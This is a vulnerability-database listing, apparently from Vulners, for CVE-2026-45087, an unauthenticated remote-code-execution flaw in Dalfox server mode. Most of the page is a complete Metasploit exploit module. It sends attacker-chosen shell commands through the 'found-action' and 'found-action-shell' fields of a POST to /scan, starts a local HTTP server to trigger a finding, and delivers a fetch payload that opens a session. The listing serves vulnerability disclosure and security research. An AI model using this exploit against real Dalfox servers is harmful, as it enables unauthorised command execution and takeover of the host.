Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dalfox Found-Action Deserialization RCE

🗓️ 25 Jun 2026 19:05:00Reported by Emmanuel David, Takahiro YokoyamaType 
metasploit
 metasploit🔗 www.rapid7.com👁 6 Views

Dalfox server RCE via deserialization of FoundAction and FoundActionShell in unauthenticated mode.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-45087
27 May 202617:34
attackerkb
Circl		CVE-2026-45087
7 May 202613:30
circl
CNNVD		dalfox 访问控制错误漏洞
27 May 202600:00
cnnvd
CVE		CVE-2026-45087
27 May 202617:34
cve
Cvelist		CVE-2026-45087 Dalfox: Unauthenticated Remote Code Execution via `found-action` in Dalfox Server Mode
27 May 202617:34
cvelist
EUVD		EUVD-2026-32615
27 May 202617:34
euvd
Github Security Blog		Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`
12 May 202615:07
github
NVD		CVE-2026-45087
27 May 202618:16
nvd
OSV		GHSA-V25V-M36W-JP4H Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`
12 May 202615:07
osv
Packet Storm		📄 Dalfox Found-Action Deserialization Remote Code Execution
25 Jun 202600:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dalfox Found-Action Deserialization RCE',
        'Description' => %q{
          When dalfox version <= 2.12.0 is started in REST API server mode (dalfox server),
          the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.
          Because model.Options - including FoundAction and FoundActionShell - is deserialized directly from attacker-supplied JSON in POST /scan,
          and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,
          any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.
        },
        'Author' => [
          'Emmanuel David',   # Vulnerability discovery and PoC
          'Takahiro Yokoyama' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2026-45087'],
          ['GHSA', 'v25v-m36w-jp4h'],
        ],
        'Targets' => [
          [
            'Linux Command', {
              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd
            }
          ],
        ],
        'DefaultOptions' => {
          'FETCH_DELETE' => true,
          'SRVPORT' => 8081,
          'RPORT' => 6664
        },
        'DefaultTarget' => 0,
        'Payload' => {
          'BadChars' => '"'
        },
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DisclosureDate' => '2026-05-07',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )

    register_advanced_options([
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
    ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'swagger/index.html')
    })
    return Exploit::CheckCode::Unknown('Could not detect the dalfox.') unless res&.code == 200

    Exploit::CheckCode::Appears('Dalfox detected.')
  end

  def on_request_uri(cli, request)
    send_response(cli, "<html><body>#{request.resource}</body></html>")
  end

  def primer
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'scan'),
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => {
        'url' => get_uri,
        'options' => {
          'found-action' => payload.encode,
          'found-action-shell' => 'bash',
          'use-headless' => false,
          'worker' => 1,
          'limit-result' => 1
        }
      }.to_json
    })
    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200
  end

  def exploit
    Timeout.timeout(datastore['HTTPDELAY']) { super }
  rescue Timeout::Error
    # When the server stops due to our timeout, this is raised
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2026 19:05Current
6Medium risk
Vulners AI Score6
CVSS 3.110
EPSS0.0032
SSVC
dalfox serverdeserialization vulnerabilityFoundActionFoundActionShellunauthenticated access
6